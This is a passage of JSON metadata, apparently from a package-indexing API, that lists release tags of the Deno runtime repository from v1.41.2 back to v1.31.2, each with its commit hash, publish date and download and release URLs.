"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"